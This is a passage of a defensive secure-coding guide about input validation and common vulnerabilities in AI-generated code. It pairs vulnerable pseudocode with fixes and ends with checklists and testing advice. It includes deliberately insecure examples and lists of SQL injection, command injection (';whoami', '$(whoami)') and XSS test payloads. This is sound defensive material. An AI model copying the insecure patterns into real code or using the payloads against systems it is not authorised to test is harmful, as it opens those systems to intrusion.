age, + "city": city + } + +// API returns partial data: +{ + "firstName": "John", + 
"lastName": null, // Could be null + "email": null, // Could be missing + "profile": { + "age": "25" + // address is missing entirely + } +} +``` + +**Why This Is Dangerous:** +- Application crashes reveal error messages to attackers +- Null pointer exceptions can leak stack traces +- Partial data from APIs, databases, or user input is common +- AI assumes training data structures are always complete +- Cascading failures when one field is null + +--- + +### BAD Example 6: Trusting Array Indices from User Input + +```pseudocode +// VULNERABLE: Using user input directly as array index + +function getItemByIndex(request): + items = ["item0", "item1", "item2", "item3", "item4"] + index = request.params.index // User-provided + + // No validation - trusts user to provide valid index + return items[index] // Out of bounds or negative index + +// Worse: Array index used for data access +function getUserData(request): + userIndex = parseInt(request.params.id) + + // Could access negative index, other users' data, or crash + return allUsersData[userIndex] + +// Object property access from user input +function getConfigValue(request): + configKey = request.params.key + + // Prototype pollution or access to __proto__, constructor + return config[configKey] +``` + +**Why This Is Dangerous:** +- Negative indices wrap to end of array in some languages +- Out-of-bounds access crashes or returns undefined behavior +- Integer overflow can produce unexpected indices +- Object property access allows prototype pollution +- `__proto__`, `constructor`, `prototype` keys can modify object behavior + +**Attack Scenarios:** +```pseudocode +// Array out of bounds: +GET /items?index=99999999 +GET /items?index=-1 + +// Prototype pollution via property access: +GET /config?key=__proto__ +GET /config?key=constructor +POST /config {"key": "__proto__", "value": {"isAdmin": true}} +``` + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Server-Side Validation Patterns + 
+```pseudocode +// SECURE: Comprehensive server-side validation with clear error messages + +function handleRegistration(request): + errors = [] + + // Email validation + email = request.body.email + if email is null or email is empty: + errors.append({"field": "email", "message": "Email is required"}) + else if length(email) > 254: // RFC 5321 limit + errors.append({"field": "email", "message": "Email too long"}) + else if not isValidEmailFormat(email): + errors.append({"field": "email", "message": "Invalid email format"}) + else if not isAllowedEmailDomain(email): // Business rule + errors.append({"field": "email", "message": "Email domain not allowed"}) + + // Password validation + password = request.body.password + if password is null or password is empty: + errors.append({"field": "password", "message": "Password is required"}) + else if length(password) < 12: + errors.append({"field": "password", "message": "Password must be 12+ characters"}) + else if length(password) > 128: // Prevent DoS via bcrypt + errors.append({"field": "password", "message": "Password too long"}) + else if not meetsComplexityRequirements(password): + errors.append({"field": "password", "message": "Password too weak"}) + + // Age validation (integer with business range) + age = request.body.age + if age is null: + errors.append({"field": "age", "message": "Age is required"}) + else if typeof(age) != "integer": + errors.append({"field": "age", "message": "Age must be a whole number"}) + else if age < 13: // Business rule: minimum age + errors.append({"field": "age", "message": "Must be at least 13 years old"}) + else if age > 150: // Sanity check + errors.append({"field": "age", "message": "Invalid age"}) + + // Return all errors at once (better UX than one at a time) + if errors.length > 0: + return {"success": false, "errors": errors} + + // Only process after validation passes + hashedPassword = hashPassword(password) + createUser(email, hashedPassword, age) + return {"success": 
true} +``` + +**Why This Is Secure:** +- Every field validated before use +- Type, format, length, and business rules all checked +- Clear, specific error messages for debugging +- All errors collected (better user experience) +- Reasonable upper bounds prevent DoS +- Validation happens server-side where client cannot bypass + +--- + +### GOOD Example 2: Schema Validation Approaches + +```pseudocode +// SECURE: Declarative schema validation with robust library + +// Define schema once, reuse everywhere +USER_REGISTRATION_SCHEMA = { + "type": "object", + "required": ["email", "password", "age", "name"], + "additionalProperties": false, // Reject unknown fields + "properties": { + "email": { + "type": "string", + "format": "email", + "maxLength": 254 + }, + "password": { + "type": "string", + "minLength": 12, + "maxLength": 128 + }, + "age": { + "type": "integer", + "minimum": 13, + "maximum": 150 + }, + "name": { + "type": "object", + "required": ["first", "last"], + "properties": { + "first": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" // Unicode letters, spaces, hyphens, apostrophes + }, + "last": { + "type": "string", + "minLength": 1, + "maxLength": 100, + "pattern": "^[\\p{L}\\s'-]+$" + } + } + } + } +} + +function handleRegistration(request): + // Validate entire payload against schema + validationResult = schemaValidator.validate(request.body, USER_REGISTRATION_SCHEMA) + + if not validationResult.valid: + return { + "success": false, + "errors": validationResult.errors // Detailed error per field + } + + // Data is guaranteed to match schema structure and constraints + processRegistration(request.body) + return {"success": true} + +// Additional business logic validation after schema validation +function processRegistration(data): + // Schema ensures structure; now check business rules + if isEmailAlreadyRegistered(data.email): + throw ValidationError("Email already registered") + + if 
isCommonPassword(data.password): + throw ValidationError("Password is too common") + + createUser(data) +``` + +**Why This Is Secure:** +- Schema is declarative, easy to audit +- `additionalProperties: false` prevents unexpected data injection +- Type coercion handled consistently by library +- Unicode-aware patterns for international names +- Nested object validation built-in +- Separation of structural validation and business rules + +--- + +### GOOD Example 3: Safe Regex Patterns + +```pseudocode +// SECURE: Anchored, bounded, and ReDoS-resistant patterns + +// Email validation - anchored and bounded +// Note: Perfect email validation is complex; often better to just check format +// and verify via confirmation email +EMAIL_PATTERN = "^[a-zA-Z0-9._%+-]{1,64}@[a-zA-Z0-9.-]{1,253}\\.[a-zA-Z]{2,63}$" + +// Safe filename - anchored, limited character set, bounded length +FILENAME_PATTERN = "^[a-zA-Z0-9][a-zA-Z0-9._-]{0,254}$" + +// Safe identifier (alphanumeric + underscore, starts with letter) +IDENTIFIER_PATTERN = "^[a-zA-Z][a-zA-Z0-9_]{0,63}$" + +// URL path segment - no special characters +PATH_SEGMENT_PATTERN = "^[a-zA-Z0-9._-]{1,255}$" + +function validateWithSafeRegex(input, pattern, maxLength): + // Length check BEFORE regex (prevents ReDoS) + if input is null or length(input) > maxLength: + return false + + // Use timeout-protected regex matching if available + try: + return regexMatchWithTimeout(pattern, input, timeout = 100ms) + catch TimeoutException: + logWarning("Regex timeout on input: " + truncate(input, 50)) + return false + +// For complex patterns, use atomic groups or possessive quantifiers +// (syntax varies by regex engine) + +// VULNERABLE: (a+)+ +// SAFE: (?>a+)+ (atomic group - no backtracking into group) +// SAFE: a++ (possessive quantifier - never backtracks) + +// Alternative: Linear-time regex engines (RE2, rust regex) +// These reject patterns that could have exponential complexity +function validateWithLinearRegex(input, pattern): + // 
RE2 guarantees O(n) matching time + return RE2.match(pattern, input) +``` + +**Why This Is Secure:** +- All patterns anchored with `^` and `$` +- Length bounded to prevent long input attacks +- Character classes don't overlap (no `[a-zA-Z0-9]+` next to `[a-z]+`) +- No nested quantifiers that could cause backtracking +- Timeout protection as defense in depth +- Option to use linear-time regex engines + +--- + +### GOOD Example 4: Type Coercion Handling + +```pseudocode +// SECURE: Explicit type handling with safe coercion + +function parseIntegerSafe(value, min, max): + // Handle null/undefined + if value is null or value is undefined: + return {valid: false, error: "Value is required"} + + // If already integer, validate range + if typeof(value) == "integer": + if value < min or value > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + return {valid: true, value: value} + + // If string, parse carefully + if typeof(value) == "string": + // Check for valid integer string (no floats, no hex, no scientific) + if not regex.match("^-?[0-9]+$", value): + return {valid: false, error: "Invalid integer format"} + + parsed = parseInt(value, 10) // Always specify radix + + // Check for NaN (parsing failure) + if isNaN(parsed): + return {valid: false, error: "Could not parse integer"} + + // Check for overflow + if parsed < MIN_SAFE_INTEGER or parsed > MAX_SAFE_INTEGER: + return {valid: false, error: "Integer overflow"} + + // Range check + if parsed < min or parsed > max: + return {valid: false, error: "Value out of range: " + min + "-" + max} + + return {valid: true, value: parsed} + + // Reject all other types + return {valid: false, error: "Expected integer, got " + typeof(value)} + +// Usage +function handlePayment(request): + amountResult = parseIntegerSafe(request.body.amount, 1, 1000000) // 1 cent to $10,000 + if not amountResult.valid: + return error("amount: " + amountResult.error) + + quantityResult = 
parseIntegerSafe(request.body.quantity, 1, 100) + if not quantityResult.valid: + return error("quantity: " + quantityResult.error) + + // Safe to use validated integers + total = amountResult.value * quantityResult.value + processPayment(total) +``` + +**Why This Is Secure:** +- Explicit handling of null/undefined +- Type checking before operations +- Safe string-to-integer parsing with radix +- Overflow checking for platform limits +- Range validation for business constraints +- Clear error messages for each failure mode + +--- + +### GOOD Example 5: Whitelist Validation + +```pseudocode +// SECURE: Allowlist approach - only accept known-good values + +// For enum-like fields, use explicit allowlist +ALLOWED_COUNTRIES = ["US", "CA", "GB", "DE", "FR", "JP", "AU"] +ALLOWED_ROLES = ["user", "moderator", "admin"] +ALLOWED_SORT_FIELDS = ["name", "date", "price", "rating"] +ALLOWED_FILE_EXTENSIONS = [".jpg", ".jpeg", ".png", ".gif", ".pdf"] + +function validateCountry(input): + // Case-insensitive comparison against allowlist + normalized = input.toUpperCase().trim() + if normalized in ALLOWED_COUNTRIES: + return {valid: true, value: normalized} + return {valid: false, error: "Invalid country code"} + +function validateSortField(input): + // Exact match required + if input in ALLOWED_SORT_FIELDS: + return {valid: true, value: input} + return {valid: false, error: "Invalid sort field"} + +function validateFileUpload(filename, content): + // Extension whitelist + extension = getExtension(filename).toLowerCase() + if extension not in ALLOWED_FILE_EXTENSIONS: + return {valid: false, error: "File type not allowed"} + + // ALSO validate content type (magic bytes) + detectedType = detectFileType(content) + if detectedType.extension != extension: + return {valid: false, error: "File content doesn't match extension"} + + // Additional: check file isn't actually executable or contains script + if containsExecutableContent(content): + return {valid: false, error: "File contains 
disallowed content"} + + return {valid: true} + +// For SQL column/table names (cannot be parameterized) +function validateColumnName(input, allowedColumns): + if input in allowedColumns: + return input // Safe to use in query + throw ValidationError("Invalid column name") + +// Usage in query +function searchProducts(filters): + sortField = validateColumnName(filters.sortBy, ["name", "price", "created_at"]) + sortOrder = filters.order == "desc" ? "DESC" : "ASC" // Binary choice + + // Now safe to interpolate (they're from allowlist) + query = "SELECT * FROM products ORDER BY " + sortField + " " + sortOrder + return database.query(query) +``` + +**Why This Is Secure:** +- Only pre-approved values accepted +- No regex complexity or bypass potential +- Clear, auditable list of allowed values +- Easy to update when requirements change +- File validation checks both extension AND content +- SQL identifiers validated against explicit list + +--- + +### GOOD Example 6: Canonicalization Before Validation + +```pseudocode +// SECURE: Normalize input before validation to prevent bypass + +function validatePath(input): + // Step 1: Reject null bytes (used to bypass filters) + if contains(input, "\x00"): + return {valid: false, error: "Invalid character in path"} + + // Step 2: Decode URL encoding (multiple rounds to catch double-encoding) + decoded = input + for i in range(3): // Max 3 rounds of decoding + newDecoded = urlDecode(decoded) + if newDecoded == decoded: + break // No more encoding to decode + decoded = newDecoded + + // Step 3: Normalize path separators + normalized = decoded.replace("\\", "/") + + // Step 4: Resolve path (remove . and ..) 
+ resolved = resolvePath(normalized) + + // Step 5: Check against allowed base directory + allowedBase = "/var/www/uploads/" + if not resolved.startsWith(allowedBase): + return {valid: false, error: "Path traversal detected"} + + // Step 6: Check for remaining dangerous patterns + if contains(resolved, ".."): + return {valid: false, error: "Invalid path component"} + + return {valid: true, value: resolved} + +function validateUsername(input): + // Normalize Unicode before validation + // NFC = Canonical Composition (combines characters) + normalized = unicodeNormalize(input, "NFC") + + // Check for confusable characters (homoglyphs) + if containsHomoglyphs(normalized): + return {valid: false, error: "Username contains confusable characters"} + + // Now validate the normalized form + if not regex.match("^[a-zA-Z0-9_]{3,20}$", normalized): + return {valid: false, error: "Invalid username format"} + + return {valid: true, value: normalized} + +function validateUrl(input): + // Parse URL to get components + parsed = parseUrl(input) + + if parsed is null: + return {valid: false, error: "Invalid URL"} + + // Validate scheme (allowlist) + if parsed.scheme not in ["http", "https"]: + return {valid: false, error: "Only HTTP(S) URLs allowed"} + + // Check for IP addresses (may be SSRF target) + if isIpAddress(parsed.host): + return {valid: false, error: "IP addresses not allowed"} + + // Check for internal hostnames + if parsed.host.endsWith(".internal") or parsed.host == "localhost": + return {valid: false, error: "Internal URLs not allowed"} + + // Check for credentials in URL + if parsed.username or parsed.password: + return {valid: false, error: "Credentials in URL not allowed"} + + // Reconstruct URL from parsed components (normalizes encoding) + canonicalUrl = buildUrl(parsed.scheme, parsed.host, parsed.port, parsed.path) + + return {valid: true, value: canonicalUrl} +``` + +**Why This Is Secure:** +- Multiple encoding layers decoded before validation +- Path 
normalization prevents traversal with `/./` or `/../` +- Unicode normalization prevents homoglyph attacks +- URL parsing validates structure before checking content +- Allowlist for URL schemes prevents `file://`, `javascript:` etc. +- SSRF protection by rejecting internal hostnames and IPs + +--- + +## Edge Cases Section + +### Edge Case 1: Unicode Normalization Issues + +```pseudocode +// DANGEROUS: Validating before normalization allows bypass + +// Attack: Using decomposed Unicode characters +// "admin" can be represented as: +// - "admin" (5 ASCII characters) +// - "admin" with combining characters: "admin" + accent marks +// - Confusables: "αdmin" (Greek alpha), "аdmin" (Cyrillic a) + +function vulnerableUsernameCheck(input): + if input == "admin": + return "Cannot register as admin" + return "OK" + +// Attacker uses: "аdmin" (Cyrillic 'а' looks like Latin 'a') +vulnerableUsernameCheck("аdmin") // Returns "OK" +// But displays as "admin" in UI! + +// SECURE: Normalize and check for confusables +function secureUsernameCheck(input): + // Step 1: Unicode normalize to NFC + normalized = unicodeNormalize(input, "NFC") + + // Step 2: Convert confusables to ASCII equivalent + ascii = convertConfusablesToAscii(normalized) + + // Step 3: Check reserved names against ASCII version + reservedNames = ["admin", "root", "system", "administrator", "support"] + if ascii.toLowerCase() in reservedNames: + return {valid: false, error: "Reserved username"} + + // Step 4: Only allow safe character set + if not isAsciiAlphanumeric(input): + return {valid: false, error: "Username must be ASCII letters and numbers"} + + return {valid: true, value: normalized} +``` + +**Detection:** Test with Unicode confusables for admin/root, combining characters, zero-width characters. 
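
The reserved-name check in Edge Case 1 can be sketched in Python roughly as follows. This is a minimal illustration, not a complete defense: the `CONFUSABLES` table, `skeleton`, and `check_username` are hypothetical names introduced here, and the table is deliberately tiny (a real deployment would more likely load the Unicode confusables data). The sketch also uses NFKC rather than the NFC shown in the pseudocode, because NFKC additionally folds compatibility forms such as fullwidth letters.

```python
import unicodedata

RESERVED_NAMES = {"admin", "root", "system", "administrator", "support"}

# Hypothetical, deliberately tiny confusables table for illustration only.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small letter a
    "\u03b1": "a",  # Greek small letter alpha
    "\u0435": "e",  # Cyrillic small letter ie
    "\u043e": "o",  # Cyrillic small letter o
}


def skeleton(name: str) -> str:
    """Fold a name to a comparison form used only for the reserved-name check."""
    normalized = unicodedata.normalize("NFKC", name)
    # Category "Cf" covers zero-width spaces/joiners and similar invisible characters.
    visible = "".join(ch for ch in normalized if unicodedata.category(ch) != "Cf")
    return "".join(CONFUSABLES.get(ch, ch) for ch in visible).casefold()


def check_username(name: str) -> tuple[bool, str]:
    """Return (ok, reason) for a candidate username."""
    # Compare the folded form against reserved names first, so look-alikes
    # are reported as reserved rather than merely "invalid".
    if skeleton(name) in RESERVED_NAMES:
        return False, "reserved username"
    # Then restrict the stored value to a plain ASCII alphanumeric set.
    if not (name.isascii() and name.isalnum()):
        return False, "username must be ASCII letters and digits"
    if not 3 <= len(name) <= 20:
        return False, "username must be 3-20 characters"
    return True, "ok"
```

Because the final step restricts usernames to ASCII letters and digits, the confusables table only affects which error is reported; the allowlist is what actually blocks look-alike registrations.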
+ +--- + +### Edge Case 2: Null Byte Injection + +```pseudocode +// DANGEROUS: Null bytes can truncate strings in some languages + +// Filename validation bypass with null byte +filename = "malicious.php\x00.jpg" + +// In C/PHP, strcmp might only see "malicious.php\x00" +// The ".jpg" is ignored +if filename.endsWith(".jpg"): + uploadFile(filename) // Allows .php upload! + +// Path validation bypass +path = "/safe/directory/../../etc/passwd\x00/safe/suffix" +// Validation sees: ends with "/safe/suffix" - looks OK +// File system sees: "/etc/passwd" + +// SECURE: Strip null bytes first +function sanitizeInput(input): + // Remove null bytes entirely + sanitized = input.replace("\x00", "") + + // Also remove other control characters + sanitized = removeControlCharacters(sanitized) + + return sanitized + +function validateFilename(input): + sanitized = sanitizeInput(input) + + // Now validate + if sanitized != input: + return {valid: false, error: "Invalid characters in filename"} + + // Continue with extension validation + // ... +``` + +**Detection:** Test all string inputs with embedded null bytes (`\x00`, `%00`). + +--- + +### Edge Case 3: Type Confusion + +```pseudocode +// DANGEROUS: Loose type comparison leads to bypass + +// JavaScript/PHP style loose comparison +function vulnerableAuth(password): + storedHash = "0e123456789" // Some MD5 hashes start with "0e" + inputHash = md5(password) + + // In PHP: "0e123456789" == "0e987654321" is TRUE! 
+ // Both are interpreted as 0 * 10^(number) = 0 + if inputHash == storedHash: // Loose comparison + return "Authenticated" + return "Failed" + +// Type confusion with objects +function vulnerablePasswordReset(token): + // Expected: token = "abc123def456" + // Attack: token = {"$gt": ""} (MongoDB injection via type confusion) + + if database.findOne({"resetToken": token}): + return "Token found" + +// SECURE: Strict type checking +function secureAuth(user, password): + storedHash = getStoredHash(user) + inputHash = hashPassword(password) + + // Strict comparison and constant-time + if typeof(inputHash) != "string" or typeof(storedHash) != "string": + return "Failed" + + if not constantTimeEquals(inputHash, storedHash): + return "Failed" + + return "Authenticated" + +function securePasswordReset(token): + // Enforce string type + if typeof(token) != "string": + return {valid: false, error: "Invalid token format"} + + // Validate format + if not regex.match("^[a-f0-9]{64}$", token): + return {valid: false, error: "Invalid token format"} + + // Now safe to query + result = database.findOne({"resetToken": token}) + // ... +``` + +**Detection:** Test with different types: arrays, objects, numbers, and booleans where strings are expected. + +--- + +### Edge Case 4: Integer Overflow in Validation + +```pseudocode +// DANGEROUS: Validation passes but computation overflows + +function vulnerablePurchase(quantity, price): + // Validate ranges + if quantity < 0 or quantity > 1000000: + return error("Invalid quantity") + if price < 0 or price > 1000000: + return error("Invalid price") + + // Both pass validation, but multiplication overflows! 
+ // quantity = 999999, price = 999999 + // total = 999998000001 (exceeds 32-bit integer) + total = quantity * price // OVERFLOW + + chargeCustomer(total) // May wrap to negative or small number + +// SECURE: Check for overflow in computation +function securePurchase(quantity, price): + // Validate individual ranges + if not isValidInteger(quantity, 1, 1000): + return error("Invalid quantity") + if not isValidInteger(price, 1, 10000000): // in cents + return error("Invalid price") + + // Check multiplication won't overflow + MAX_SAFE_TOTAL = 2147483647 // 32-bit signed max + + if quantity > MAX_SAFE_TOTAL / price: + return error("Order total too large") + + total = quantity * price // Now safe + + // Additional business validation + if total > MAX_ALLOWED_TRANSACTION: + return error("Transaction exceeds limit") + + chargeCustomer(total) + +// Alternative: Use arbitrary precision arithmetic for money +function securePurchaseWithDecimal(quantity, price): + quantityDecimal = Decimal(quantity) + priceDecimal = Decimal(price) + + total = quantityDecimal * priceDecimal // No overflow + + if total > Decimal(MAX_ALLOWED_TRANSACTION): + return error("Transaction exceeds limit") + + chargeCustomer(total) +``` + +**Detection:** Test with MAX_INT, MAX_INT-1, boundary values, and combinations that multiply to overflow. + +--- + +## Common Mistakes Section + +### Common Mistake 1: Validating Formatted Output Instead of Input + +```pseudocode +// WRONG: Validate after formatting +function displayUserData(userId): + userData = database.getUser(userId) // Raw from DB + + // Format for display + formattedName = formatName(userData.name) + formattedBio = formatBio(userData.bio) + + // Validating AFTER format - too late! 
+ if containsHtml(formattedName): // Already formatted/escaped + return error("Invalid name") + + return template.render(formattedName, formattedBio) + +// CORRECT: Validate at input, encode at output +function saveUserData(request): + name = request.body.name + bio = request.body.bio + + // Validate raw input BEFORE storing + if not isValidName(name): + return error("Invalid name") + + if containsDangerousPatterns(bio): + return error("Invalid bio content") + + // Store validated (but not encoded) data + database.saveUser({"name": name, "bio": bio}) + +function displayUserData(userId): + userData = database.getUser(userId) + + // Encode for output context (don't validate again) + return template.render({ + "name": htmlEncode(userData.name), + "bio": htmlEncode(userData.bio) + }) +``` + +**Why This Is Wrong:** +- Validation should happen at input boundary, not output +- Formatted/encoded data may pass validation but still be dangerous +- Encoding should happen at output, specific to context +- Validation after formatting is security theater + +--- + +### Common Mistake 2: Using String Operations on Binary Data + +```pseudocode +// WRONG: String operations on binary data +function processUploadedImage(fileContent): + // Convert binary to string - CORRUPTS DATA + contentString = fileContent.toString("utf-8") + + // String operations fail on binary + if contentString.startsWith("\x89PNG"): // May not work correctly + processImage(contentString) // Corrupted! + + // Regex on binary data is meaningless + if regex.match(", javascript:alert(1) + +// 5. 
ReDoS testing +- For each regex, test with pattern: (valid_char * 30) + invalid_char +- Measure response time - should be < 100ms +- Exponential time indicates ReDoS vulnerability +``` + +--- + +## Security Checklist + +- [ ] All user input validated on the server side (never trust client-side only) +- [ ] Schema validation enforces expected structure (`additionalProperties: false`) +- [ ] All required fields checked for null/undefined/empty +- [ ] String lengths validated with reasonable maximums (prevents DoS) +- [ ] Numeric values validated for type, range, and overflow potential +- [ ] Arrays validated for max length and item constraints +- [ ] Enum fields validated against explicit allowlist +- [ ] All regex patterns anchored with `^` and `$` +- [ ] Regex patterns tested for ReDoS vulnerability +- [ ] Length checked BEFORE regex matching (ReDoS mitigation) +- [ ] Timeout protection on regex operations (defense in depth) +- [ ] Unicode input normalized before validation (NFC/NFKC) +- [ ] Null bytes (`\x00`, `%00`) rejected in string input +- [ ] Path inputs canonicalized and validated against allowed directories +- [ ] URL inputs parsed and validated (scheme, host, no credentials) +- [ ] File uploads validated by both extension AND content type +- [ ] Integer arithmetic checked for overflow before computation +- [ ] Type coercion explicit with proper error handling +- [ ] Validation consistent across all endpoints (centralized validators) +- [ ] Error messages helpful but don't leak validation logic details +- [ ] Validation rules documented and version controlled +- [ ] Validation tested with fuzzing and boundary values + +--- + +# Executive Summary + +## The 6 Critical Security Anti-Patterns + +This document provides comprehensive coverage of the **6 most critical and commonly occurring security vulnerabilities** in AI-generated code. Together, these patterns represent the root causes of the vast majority of security incidents in AI-assisted development. 
+ +### Pattern Overview + +| # | Pattern | Risk Level | AI Frequency | Key Threat | +|---|---------|------------|--------------|------------| +| 1 | **Hardcoded Secrets** | Critical | Very High | Credential theft, API abuse, data breaches | +| 2 | **SQL/Command Injection** | Critical | High | Database compromise, RCE, system takeover | +| 3 | **Cross-Site Scripting (XSS)** | High | Very High | Session hijacking, account takeover, defacement | +| 4 | **Authentication/Session** | Critical | High | Complete authentication bypass, privilege escalation | +| 5 | **Cryptographic Failures** | High | Very High | Data decryption, credential exposure, forgery | +| 6 | **Input Validation** | High | Very High | Enables all other injection attacks | + +### Why These 6 Patterns Matter + +**They are interconnected:** Input validation failures enable injection attacks. Hardcoded secrets undermine cryptography, because a leaked key defeats even a strong cipher. Authentication weaknesses make XSS more devastating. + +**AI models struggle with all of them:** Training data contains countless examples of insecure patterns. AI models optimize for "working code" rather than "secure code." The patterns that make code secure are often invisible (environment variables, parameterized queries, proper encoding) while insecure patterns are explicit and visible. + +**They have compounding effects:** A single hardcoded secret can expose thousands of users. A single SQL injection can dump an entire database. A single stored XSS vulnerability can persist across sessions and users. + +--- + +# Critical Checklists: One-Line Reminders + +These condensed checklists provide a quick reference for each pattern. Use them during code review or before committing changes. 
+ +## Pattern 1: Hardcoded Secrets + +| ✓ | Checkpoint | +|---|------------| +| □ | No API keys, passwords, or tokens in source files | +| □ | All secrets loaded from environment variables or secret managers | +| □ | `.env` files in `.gitignore` with `.env.example` for templates | +| □ | No secrets in logs, error messages, or URLs | +| □ | Secret scanning enabled in CI/CD pipeline | +| □ | Credentials rotated regularly and rotation is automated | + +## Pattern 2: SQL/Command Injection + +| ✓ | Checkpoint | +|---|------------| +| □ | All SQL queries use parameterized statements (no string concatenation) | +| □ | Dynamic identifiers (table/column names, ORDER BY targets) validated against allowlist | +| □ | ORM queries reviewed for raw query vulnerabilities | +| □ | Shell commands avoid user input; if required, use allowlist validation | +| □ | Second-order injection checked (stored data used in queries) | +| □ | Prepared statements used for ALL statement types (SELECT, INSERT, UPDATE, DELETE) | + +## Pattern 3: Cross-Site Scripting (XSS) + +| ✓ | Checkpoint | +|---|------------| +| □ | HTML encoding for HTML body context | +| □ | Attribute encoding for HTML attributes (especially event handlers) | +| □ | JavaScript encoding for inline scripts | +| □ | URL encoding for URL contexts | +| □ | CSP headers configured with strict policy (no `unsafe-inline`) | +| □ | `innerHTML` avoided; use `textContent` or framework safe bindings | +| □ | Sanitization libraries tested against mutation XSS | + +## Pattern 4: Authentication/Session Security + +| ✓ | Checkpoint | +|---|------------| +| □ | Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) | +| □ | Session tokens cryptographically random (256+ bits entropy) | +| □ | JWT algorithm explicitly validated (`alg: none` rejected) | +| □ | Tokens stored in HttpOnly, Secure, SameSite cookies | +| □ | Session invalidated on logout (server-side) | +| □ | Constant-time comparison for password/token verification | +| □ | Rate limiting on authentication endpoints | 
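
Two of the Pattern 4 checkpoints (cryptographically random session tokens and constant-time comparison) can be illustrated with Python's standard library. This is a hedged sketch: the helper names `new_session_token` and `tokens_match` are invented for the example, and a real application would typically rely on its framework's session handling rather than hand-rolled helpers.

```python
import hmac
import secrets


def new_session_token() -> str:
    # 32 bytes from the OS CSPRNG = 256 bits of entropy, URL-safe encoded.
    return secrets.token_urlsafe(32)


def tokens_match(presented: str, expected: str) -> bool:
    # compare_digest avoids leaking, through timing, where the inputs differ.
    return hmac.compare_digest(presented.encode("utf-8"), expected.encode("utf-8"))
```

Comparing with `==` would usually return the right answer too, but it can short-circuit on the first differing byte, which is the timing signal the checklist item is meant to remove.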
+ +## Pattern 5: Cryptographic Failures + +| ✓ | Checkpoint | +|---|------------| +| □ | AES-256-GCM or ChaCha20-Poly1305 for symmetric encryption | +| □ | Fresh random IV/nonce for every encryption operation | +| □ | CSPRNG used for all security-sensitive random values | +| □ | bcrypt/Argon2id for password hashing (not PBKDF2 for passwords) | +| □ | Key derivation uses HKDF or PBKDF2 with appropriate iterations | +| □ | No ECB mode, no static IVs, no Math.random() | +| □ | Constant-time comparison for MAC/signature verification | + +## Pattern 6: Input Validation + +| ✓ | Checkpoint | +|---|------------| +| □ | All validation performed on server side | +| □ | Schema validation with `additionalProperties: false` | +| □ | All regex patterns anchored with `^` and `$` | +| □ | Length limits checked BEFORE regex matching | +| □ | Null bytes rejected in string input | +| □ | Unicode normalized before validation | +| □ | Type coercion explicit with error handling | + +--- + +# Testing Recommendations by Vulnerability Type + +## Hardcoded Secrets Testing + +```pseudocode +// Automated Secret Detection +1. Pre-commit hooks with secret scanners: + - TruffleHog + - detect-secrets + - gitleaks + - git-secrets + +2. CI/CD Pipeline Scanning: + - Run on every PR/MR + - Scan full git history on merge to main + - Block deployment on secret detection + +3. Runtime Detection: + - Log analysis for credential patterns + - API request auditing for hardcoded keys + - Cloud provider secret exposure alerts + +// Testing Checklist +- [ ] Scan all source files for API key patterns +- [ ] Scan all config files for password strings +- [ ] Check git history for past secret commits +- [ ] Verify environment variables are properly loaded +- [ ] Test application behavior when secrets are missing +- [ ] Verify secrets are not exposed in error messages +``` + +## SQL/Command Injection Testing + +```pseudocode +// Automated Testing Tools +1. 
SAST (Static Analysis): + - Semgrep with injection rules + - CodeQL injection queries + - SonarQube SQL injection checks + +2. DAST (Dynamic Analysis): + - SQLMap for SQL injection + - Burp Suite active scanning + - OWASP ZAP automated scan + +3. Manual Testing Payloads: + // SQL Injection + - Single quote: ' + - Comment: -- or # + - Boolean: ' OR '1'='1 + - Time-based: '; WAITFOR DELAY '0:0:10'-- + - Union: ' UNION SELECT null,null-- + + // Command Injection + - Semicolon: ;whoami + - Pipe: |id + - Backticks: `whoami` + - Command substitution: $(whoami) + - Newline: %0a id + +// Testing Checklist +- [ ] Test all user input fields with injection payloads +- [ ] Test ORDER BY, LIMIT, table name parameters +- [ ] Test stored data for second-order injection +- [ ] Test file paths for command injection +- [ ] Verify all queries use parameterization +- [ ] Check logs don't reveal injection success/failure +``` + +## XSS Testing + +```pseudocode +// Automated Testing +1. Browser Tools: + - DOM Invader (Burp) + - XSS Hunter + - DOMPurify testing mode + +2. Automated Scanners: + - Burp Suite XSS scanner + - OWASP ZAP active scan + - Nuclei XSS templates + +3. Manual Testing Payloads: + // HTML Context + - + - + - + + // Attribute Context + - " onmouseover="alert(1) + - ' onfocus='alert(1)' autofocus=' + + // JavaScript Context + - '-alert(1)-' + - ';alert(1)// + - \u003cscript\u003e + + // URL Context + - javascript:alert(1) + - data:text/html, + +// Testing Checklist +- [ ] Test all output points with context-specific payloads +- [ ] Test encoding bypass techniques +- [ ] Test DOM XSS with source/sink analysis +- [ ] Verify CSP headers block inline scripts +- [ ] Test mutation XSS with sanitizer bypass payloads +- [ ] Check for polyglot XSS across contexts +``` + +## Authentication/Session Testing + +```pseudocode +// Testing Tools +1. Session Analysis: + - Burp Suite session handling + - OWASP ZAP session management + - Custom scripts for token analysis + +2. 
JWT Testing: + - jwt.io debugger + - jwt_tool + - jose library testing + +3. Manual Testing: + // Session Token Analysis + - Check entropy (should be 256+ bits) + - Test token predictability + - Test session fixation + + // JWT Attacks + - Algorithm confusion (RS256 → HS256) + - None algorithm bypass + - Key injection attacks + - Signature stripping + + // Authentication Bypass + - SQL injection in login + - Password reset token prediction + - OAuth state parameter manipulation + +// Testing Checklist +- [ ] Test session token randomness +- [ ] Verify session invalidation on logout +- [ ] Test for session fixation +- [ ] Verify JWT algorithm validation +- [ ] Test rate limiting on login +- [ ] Check for timing attacks on password comparison +- [ ] Test password reset flow for token issues +``` + +## Cryptographic Implementation Testing + +```pseudocode +// Crypto Testing Tools +1. Static Analysis: + - Semgrep crypto rules + - CryptoGuard + - Crypto-detector + +2. Manual Review: + // Check for weak algorithms: + grep -r "MD5\|SHA1\|DES\|RC4\|ECB" . + + // Check for static IVs: + grep -r "iv\s*=\s*[\"'][0-9a-fA-F]+[\"']" . + + // Check for weak randomness: + grep -r "Math\.random\|random\.random\|rand\(\)" . + +3. Runtime Testing: + - Encrypt same plaintext twice, verify different ciphertext + - Test key derivation iterations (should take 100ms+) + - Verify timing consistency in comparisons + +// Testing Checklist +- [ ] Verify no MD5/SHA1/DES/RC4/ECB usage +- [ ] Confirm unique IV/nonce per encryption +- [ ] Test password hashing takes appropriate time (100ms+) +- [ ] Verify CSPRNG used for all secrets +- [ ] Check key derivation iteration counts +- [ ] Test for padding oracle vulnerabilities +- [ ] Verify 